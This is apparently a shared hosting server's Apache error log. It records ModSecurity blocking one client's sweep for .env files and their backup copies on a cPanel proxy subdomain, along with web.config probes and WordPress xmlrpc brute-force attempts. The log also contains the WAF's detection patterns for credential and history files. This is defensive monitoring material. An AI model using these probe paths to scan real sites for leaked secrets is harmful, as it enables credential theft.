[Tue May 26 13:44:42.776755 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776791 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.777101 2026] [security2:error] [pid 536875:tid 537081] [client 208.84.100.173:36284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVWcur_-FTveSGlx1H6fQAAANE"]
[Tue May 26 13:44:42.777352 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.777386 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:43.904572 2026] [security2:error] [pid 536875:tid 537112] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWc-r_-FTveSGlx1H6gQAAAPA"]
[Tue May 26 13:44:43.975200 2026] [proxy:error] [pid 536875:tid 537079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:43.975257 2026] [proxy_http:error] [pid 536875:tid 537079] [client 208.84.100.173:36322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:43.975910 2026] [proxy:error] [pid 536875:tid 537079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:43.975963 2026] [proxy_http:error] [pid 536875:tid 537079] [client 208.84.100.173:36322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.192662 2026] [security2:error] [pid 536875:tid 537080] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWc-r_-FTveSGlx1H6iQAAANA"]
[Tue May 26 13:44:44.559487 2026] [security2:error] [pid 536875:tid 537011] [client 208.84.100.173:36312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVWdOr_-FTveSGlx1H6oAAAAIs"]
[Tue May 26 13:44:44.678932 2026] [proxy:error] [pid 536875:tid 537086] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.678990 2026] [proxy_http:error] [pid 536875:tid 537086] [client 208.84.100.173:36284] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679282 2026] [proxy:error] [pid 536875:tid 537033] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.679356 2026] [proxy_http:error] [pid 536875:tid 537033] [client 208.84.100.173:36332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679603 2026] [proxy:error] [pid 536875:tid 537086] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.679649 2026] [proxy_http:error] [pid 536875:tid 537086] [client 208.84.100.173:36284] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679976 2026] [proxy:error] [pid 536875:tid 537033] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.680012 2026] [proxy_http:error] [pid 536875:tid 537033] [client 208.84.100.173:36332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.872960 2026] [security2:error] [pid 536875:tid 537007] [client 106.192.248.115:19978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWdOr_-FTveSGlx1H6rQAAAIc"]
[Tue May 26 13:44:44.873119 2026] [security2:error] [pid 536875:tid 537007] [client 106.192.248.115:19978] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWdOr_-FTveSGlx1H6rQAAAIc"]
[Tue May 26 13:44:44.975230 2026] [proxy:error] [pid 536875:tid 537091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.975278 2026] [proxy_http:error] [pid 536875:tid 537091] [client 208.84.100.173:36312] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.975876 2026] [proxy:error] [pid 536875:tid 537091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.975912 2026] [proxy_http:error] [pid 536875:tid 537091] [client 208.84.100.173:36312] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.063025 2026] [security2:error] [pid 536875:tid 537119] [client 208.84.100.173:36602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVWder_-FTveSGlx1H6sQAAAPc"]
[Tue May 26 13:44:45.063051 2026] [security2:error] [pid 544395:tid 544616] [client 208.84.100.173:36616] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVWdRmrs7g3RMCdp8XfmQAAAFs"]
[Tue May 26 13:44:45.063745 2026] [security2:error] [pid 536875:tid 537109] [client 208.84.100.173:36574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVWder_-FTveSGlx1H6tQAAAO0"]
[Tue May 26 13:44:45.064298 2026] [security2:error] [pid 536875:tid 537078] [client 208.84.100.173:36566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVWder_-FTveSGlx1H6twAAAM4"]
[Tue May 26 13:44:45.064675 2026] [security2:error] [pid 536875:tid 537119] [client 208.84.100.173:36466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVWder_-FTveSGlx1H6vgAAAPc"]
[Tue May 26 13:44:45.064694 2026] [security2:error] [pid 536875:tid 537036] [client 208.84.100.173:36552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVWder_-FTveSGlx1H6uQAAAKQ"]
[Tue May 26 13:44:45.064708 2026] [security2:error] [pid 536875:tid 537081] [client 208.84.100.173:36542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVWder_-FTveSGlx1H6uAAAANE"]
[Tue May 26 13:44:45.064723 2026] [security2:error] [pid 536875:tid 537016] [client 208.84.100.173:36592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVWder_-FTveSGlx1H6swAAAJA"]
[Tue May 26 13:44:45.065097 2026] [security2:error] [pid 536875:tid 537021] [client 208.84.100.173:36558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVWder_-FTveSGlx1H6tgAAAJU"]
[Tue May 26 13:44:45.065110 2026] [security2:error] [pid 544395:tid 544563] [client 208.84.100.173:36496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVWdRmrs7g3RMCdp8XfmgAAACY"]
[Tue May 26 13:44:45.065129 2026] [security2:error] [pid 536875:tid 537126] [client 208.84.100.173:36516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVWder_-FTveSGlx1H6uwAAAP4"]
[Tue May 26 13:44:45.065224 2026] [security2:error] [pid 536875:tid 537055] [client 208.84.100.173:36472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVWder_-FTveSGlx1H6vQAAALc"]
[Tue May 26 13:44:45.065237 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.065298 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.065326 2026] [security2:error] [pid 536875:tid 537070] [client 208.84.100.173:36512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVWder_-FTveSGlx1H6vAAAAMY"]
[Tue May 26 13:44:45.065355 2026] [security2:error] [pid 536875:tid 537088] [client 208.84.100.173:36588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVWder_-FTveSGlx1H6sgAAANg"]
[Tue May 26 13:44:45.066018 2026] [proxy:error] [pid 544395:tid 544610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066055 2026] [proxy_http:error] [pid 544395:tid 544610] [client 208.84.100.173:36414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.066170 2026] [security2:error] [pid 544395:tid 544538] [client 208.84.100.173:36394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVWdRmrs7g3RMCdp8XfngAAAA0"]
[Tue May 26 13:44:45.066332 2026] [security2:error] [pid 544395:tid 544595] [client 208.84.100.173:36438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVWdRmrs7g3RMCdp8XfmwAAAEY"]
[Tue May 26 13:44:45.066363 2026] [security2:error] [pid 544395:tid 544622] [client 208.84.100.173:36482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVWdRmrs7g3RMCdp8XfoAAAAGE"]
[Tue May 26 13:44:45.066364 2026] [security2:error] [pid 544395:tid 544602] [client 208.84.100.173:36452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVWdRmrs7g3RMCdp8XfnwAAAE0"]
[Tue May 26 13:44:45.066389 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066457 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.066739 2026] [proxy:error] [pid 544395:tid 544619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066789 2026] [proxy_http:error] [pid 544395:tid 544619] [client 208.84.100.173:36460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.067038 2026] [security2:error] [pid 544395:tid 544611] [client 208.84.100.173:36486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVWdRmrs7g3RMCdp8XfoQAAAFY"]
[Tue May 26 13:44:45.067476 2026] [proxy:error] [pid 544395:tid 544619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.067525 2026] [proxy_http:error] [pid 544395:tid 544619] [client 208.84.100.173:36460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.067528 2026] [security2:error] [pid 544395:tid 544585] [client 208.84.100.173:36436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVWdRmrs7g3RMCdp8XfowAAADw"]
[Tue May 26 13:44:45.067619 2026] [proxy:error] [pid 544395:tid 544610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.067679 2026] [proxy_http:error] [pid 544395:tid 544610] [client 208.84.100.173:36414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068362 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068375 2026] [proxy:error] [pid 544395:tid 544616] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068403 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068416 2026] [proxy_http:error] [pid 544395:tid 544616] [client 208.84.100.173:36406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068520 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068566 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068598 2026] [proxy:error] [pid 544395:tid 544612] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068666 2026] [proxy_http:error] [pid 544395:tid 544612] [client 208.84.100.173:36420] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.069027 2026] [proxy:error] [pid 544395:tid 544616] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.069065 2026] [proxy_http:error] [pid 544395:tid 544616] [client 208.84.100.173:36406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.069300 2026] [proxy:error] [pid 544395:tid 544612] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.069358 2026] [proxy_http:error] [pid 544395:tid 544612] [client 208.84.100.173:36420] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:46.026129 2026] [security2:error] [pid 544395:tid 544543] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWdRmrs7g3RMCdp8XfsAAAABI"]
[Tue May 26 13:44:46.284204 2026] [proxy:error] [pid 536875:tid 537131] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:46.284277 2026] [proxy_http:error] [pid 536875:tid 537131] [client 208.84.100.173:36592] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:46.284916 2026] [proxy:error] [pid 536875:tid 537131] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:46.284962 2026] [proxy_http:error] [pid 536875:tid 537131] [client 208.84.100.173:36592] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:48.967061 2026] [security2:error] [pid 544395:tid 544567] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWeBmrs7g3RMCdp8Xf0gAAACo"]
[Tue May 26 13:44:49.986404 2026] [security2:error] [pid 544395:tid 544613] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWeRmrs7g3RMCdp8Xf6AAAAFg"]
[Tue May 26 13:44:50.360244 2026] [security2:error] [pid 544395:tid 544414] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/web.config"] [unique_id "ahVWehmrs7g3RMCdp8Xf_gAALRI"]
[Tue May 26 13:44:51.340360 2026] [security2:error] [pid 536875:tid 537011] [client 129.222.147.134:39400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWe-r_-FTveSGlx1H7GgAAAIs"]
[Tue May 26 13:44:51.348148 2026] [security2:error] [pid 536875:tid 537011] [client 129.222.147.134:39400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWe-r_-FTveSGlx1H7GgAAAIs"]
[Tue May 26 13:44:51.564811 2026] [security2:error] [pid 544395:tid 544552] [client 209.146.63.66:54313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.63.146.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVWexmrs7g3RMCdp8XgJQAAABs"]
[Tue May 26 13:44:51.918841 2026] [security2:error] [pid 544395:tid 544622] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWexmrs7g3RMCdp8XgKgAAAGE"]
[Tue May 26 13:44:53.592890 2026] [security2:error] [pid 544395:tid 544614] [client 104.164.173.136:9836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVWfRmrs7g3RMCdp8XgigAAAFk"]
[Tue May 26 13:44:54.372579 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWfRmrs7g3RMCdp8XgoQAAAFo"]
[Tue May 26 13:44:55.107589 2026] [security2:error] [pid 544395:tid 544551] [client 35.237.188.134:64947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.188.237.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWfhmrs7g3RMCdp8XgtgAAABo"]
